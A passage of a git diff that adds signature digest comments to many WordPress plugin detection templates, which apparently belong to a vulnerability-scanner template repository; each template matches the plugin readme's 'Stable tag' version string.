b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220046e928c97a054c611e36a1d63a5da4d137dee1d1a1606a7407e708283e5967c022100e3d048fc32feb15474d86fe1ce45f99fd3cfa6ad2ea398807c80026c6ec11961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..a5398d363f 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071f41abf23f9e8e54ad25a2c7caeaa6b09e1366930ccc4427124c8d95a52be1a022100d64d7ca145f9338d2a4d04bc2c2b70876852564dea2fd70f16d6190ad1173cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..e27ceb1fa7 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d2edbd1555944c17b89af8cc09819e9a5c9da2aad41793a8da820212715c89f022100ed17ed3f06771ec9e3387b9056ce07eea10e4fce1a29479e904a32fdeeafc67f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..0fb97f9fef 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206ccfb26d689e710333ae287a78f9852eae5293a70f168afded705324574f8943022100b43ba2ecebaa110e7ed8169d925b387d38ede2361b843c3475b854c14dda8152:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..4c9a858488 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204a6f98acb769a4e96539ca0db8bc101490fcfba45fdf2ba6c46a6abe9f8d6c48022100fb65c049a2f36f6168f2da2ba2f5e792d9448da88da5f42e4d4852b4a4469bda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..f2de6448d6 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009629a6778faa007b0004e6ba90e04c73f7cbd926b9bb513d9719287415fc48d5022100e94e287a71450d2f28454e086bb37d93a603710374a29e552fa2fee5ad5e7bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..ad9813b1c8 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f97e8710d676ae9160e28ef08aef7f488b5ed0bcdb4bf62dce42fe96c6439c7a0220777241e5fca732e47147eb3d73a95fb0c20e41b18e29b0f44fff21a7ac5077d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..f4940fb8b8 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205be901f97937b80f842149c97e752689c44425f7d3555dd40bc9185b69f6f47a022050a91237a2d84d4e4e49770a37a7001db0314e9c0d1749c18c7a2a736649453c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..11c76b2bbf 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ca92673db6e46aebaaa39f46b39e15bf748fcfb035d374fd20ffa5b377dcb0b80220008b95539085eec642385a5bfc6c83daef7ebe2008311674198b80b7d0bc3d95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..ca5304e26c 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5f598b2a89dd0bb01bb5615010bd1d42db1497737dc8177c087661e1fcfe9fc02210092b31de1a6f44394629a8215fdf95d87532e7705e89f75e2140bd4fe2285b56a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..c000b70da5 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201ee77a058cf0610db56decc856b905aa45edc2a41c9b1ad69af78127a4cfbc86022100f6289f9486c28423a28802dda001a32332bd2186b6087ffc524a4eef772228a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..54f59f0dff 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200dfa9e916a92e32b1897aa37b9312e69881ad716cfbd1d49efe3634e48991cd0022100ee16719a1dfe4c5260f2e32b7bc71618bfd6edac6179e86499d0d1dbc5847fc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..cdf4e204dc 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b748876a2cffb9fc37ad26d802789c6a520a50ccb49ed2bc9c565c970348bc05022100d8426557ea447d9acee1b7dd46bfc774e74f8b705593363c736e9f952772a437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..d3dc28dd2a 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e351bd812c0326f0ac6bc149f3fd8ad2923a5bcb0c9a75e6e9848d164876cab022100ca9b07a2ac44542ac88c36ed4ce6ccdbc858557e49cadab28dcefc8537afaf88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..6b0a14526c 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203eb7a75fb0085504380d4c384e06909bb651c6d9695e12ea0bdd40e9f035e5ea022100d1cdbd41eadc82e7af1752385ea640f8940d5d2d09fe8a698d832e09ae678267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..4a5f181219 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b1da0482d87fcfd4e9440080aa8605a912b4574b70458453d920376c73fdf9c20221008c4fc74b6844c8c5ec208217e6b740446741cc705530bafad1e3fac68f442ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..861df0f71c 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202dec65985fbfb9da1033e2d76f9555849a9bbc003f3f6a6fe78de4b016ff03b002204dafc22fa330d29133cb80e168366d786434cf791bc9c8a8fbe144e2a6dafc6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..e56a64d4d7 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071d04f83ebfaa67eddb4f6b9db3b6d0074748ef05fb7d0687da3d6e17721147e02203895100c1e1492c8b29ede91d278abd746f64049c3c8cea019316680ec715ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..cf15e45e29 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203069d24603d84ebd9296d3113292ba426f06ca190039bb8df86adae68006ea9c022100ffdc45e4b21a165717dab8d9a39b4e2177b2f2dd88236391dcd5d47584a7a878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..e012e13177 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dd7a3ea168f0180134a46eea79628ce4e6209138c9b954a2036b88beeb244d5a022100efa434e54ddb8e02c58966c0000e69b12a8b48483a769ac39938bac6c55c6c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..1d6b39a398 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008175acbf80e035ccb6259ba23d4c3db3bbf996fdd322092ea13b1e2bd8bf18ec022027076fb7723c38a124e5654bfd8c7a73a767a4398b86fd7bb2a5d040b8e4d09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..6c92036c8d 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025ab4b39f115aae8153279a941269230f09455fa6ad470fe9a2721210218c883022100a6cbfb5ded92c1f95dddd778836c5e58acea52191b7948abf62608d556e735d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..4a665b8960 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b862d04f0a7a16b9fc4ea2df04acd1aed17de491d26d03f1b57bb716ba9a4bad02210080408714475925655c467069c5db6e225d4e1e1bf95e68a4ed229bac41481817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..863522bf1d 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f0080fc1491182215cc86adb95ca635991a385a8388f1d5ac10c10a1ff4ab76e0220616fa69adc89fd01960d092924b0f354075388e431a81332e1ea662fc408ce10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..487bd4f910 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a1958ee9414971993baf64a11212d6a8a5e609481b4a4e6b1f85bcf763b189f1022100ed5067ad4bb7a185ae5c37360cc61fe3ecc47583162675565b47678b72973ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..ecd98f6b08 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da66ca71afe555dab410fe34a0b8e2f7976f2fa3c769f4e238361523d56d95fa02206b3e35ad57a422958daa04a85da73378a3718a6a17f57ff448e31d49d1294567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..666b6decf8 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dcc288942f53c8e1ec5a1dfb91c87cbbb8f60e189267ee736e992fa3f738eef30220042ab9be4b520bc411b7a8c195d511b08f80104568ce4b8583bcbfdf0b6f07a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..23694173df 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207b82497efafc269d4414f7737d13b0bccdb873c8817d44f6dec61859bfd922100221008aa78d84819dfec246dbfe7a4c619ebdc6f576c5ec65da9b704e9a7eb364748e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..d65055a3e6 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085b4fd770dfa661f81bfc77fcf505342391e6d7b0721aca5e6399f04542dd6fc022100951ce549addcd1a6dcdf2bfb699591ede6ab07a7c12028e79e4058322e13ced1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..4b7f05a78b 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e566aa07fa0d3703964b107cd0bccd39761853a2cccbea866b05ae3b959cc100220665b95c2725d338737ce0484399b6d5b799ae75c2908d3952db1b63463d9fdd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..5c51a925b0 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205caec4b547bc85e47b2909a4ca8cd1dfcdc3fdcdfacfb29e3e23d0c8d77fe8fd022100a3ba8e3306207aa8ca6a977b0061de572a1f1218a8dad9fe1f41639951ea18bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..40fdd8aa1d 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ab33ab960bd254b43988d4eb516c303c728df599bd38144883ccef0335163648022100a645d4bb15d29e4532399d987839a2ded8c914c321e6bc0324669458fbb1b604:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..9709ebf1e5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022053de2a3f3609d09f17b179b01dfe45509cf0ba754f73c16ffd5c0b0ea6c5f049022100896101016b646a73527ea408edc09bbd55898ed7b8c72cd0c507f1ceb6956b66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..c9822ca1a3 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022049a36f46d127c5aaa591e63f1eab1b173d9099b58a680da2198b5260990640ab022100bb6776c205fc892c6c17d973734315d556ded32932f5ee253851b5042a559730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..76af04fb15 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e0ea23afa4741fd3efc7217774934521786c197c68a97d821c6a0a0231fbce5602204e439c844ab619fdec229ca7a9c5ef82a2f730af81144b7e10361f80063ef00f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..35fc8a9678 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009b14a708aa3410fb1dcfd245e8faf2bde934a440841e3b7fcad9f42be7e9c058022100d48eb97f15c1c638bdbf62c186c3560c68b8f37db70f24d3ef6a8e0f3cbb1b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..534f8dc8e6 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c45c1feb21a189012ccf13eb61ac7c07382913b275cb14f046601a46dfe49baa0220572693fdc965f9a33d51b81fc60d671ad82e7d5f4b37133dfac637a48515b42b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..1377a3b95e 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c2b9acfcdd2beacfd281d03ee8629f34514c969eab251dcb908e8e1b32aa812a02202479485e8d51c76922e387bc70bd8020db87352ed3179de160a1cc83f54726ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..192ebbe2f6 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c67f3a4e61b94cda233ab41ee5b2ad88772e775e993c94d2cef9569cba2bcc9902201266b973bf09a9024886a997ac55a4ccf1e35f7b392ef11e93fce946e7627927:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..062aaaf76e 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022023485b9d1c97ef81caaf28db89d189f080c7c703b88951fd38ea03201228141f022005b641e18ee83930af7d9c58e2f3b009acbb8b98d86d62fef20ee0d9ee65a6f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..0f568960dd 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ed96f8e99c42e97f3ba1027d0fd404a055aa9f487778e29556be3134c1b0411e02206ef65ba327dd6ea6731af2f33e4ce841ce65338d2af14071bd70d63a9de42182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..d0788d69a1 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009d3983bc5c1b11d6f1e37e06c26e46d062658f372f1036e14079ef2c055f178a0220529cf91b9dc008e90223531238ca83851ae84132fc5136de3d82b25171f57c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..7ad8f7fcb1 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024adddef1cc8575045628e710a92492932ea826dea9675d8184feff4aa53692a02207f2c22cb18be07a65c18d859d2210d7b6b3b36499dcd893541e3fd2a01fcca4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..5b3756a8e6 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022054db2a79331ce53cfa3377b5007bf2a2813e266520bf7b67c9b39cb4aa1fce87022100c7d8aa26237209fbe40d963bc6686ad694877db2be39881ad842e1895ce009f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..fc21c8f2db 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e5a7ebe491eac618d380f20010d3ee8e990e25cba87819a8a6038cf67e79251a022100fd900801243ea273ecf33b99fcd808204a2854adb58264f57118331195420878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..39139aa0ac 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070a70eacb3d380d3a14896ca1465cf52e2a5931b8e1127fb8fad8613b6e00c9702205f5f214c3c3bcd063129741fb132ee08bc3915517ef60cd8ff751fa9a816873e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..2498267cdb 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe55a94bc34146352ee1f7a00f8b921744537cc10341a01ca0557c796c82e72402207e117c2003c306137f6ee05ec16be75d4ac3b1b5746b95d5e296bd5d4d9e2453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..310553eab4 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001f906d2d1443971efbab8036bf86942ee1001971094887b274fe6bdd7212897022062e2618ac132770d8a570a3d367136ec7c8e76fdefb2dc9b3bc0ab8b32944d6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 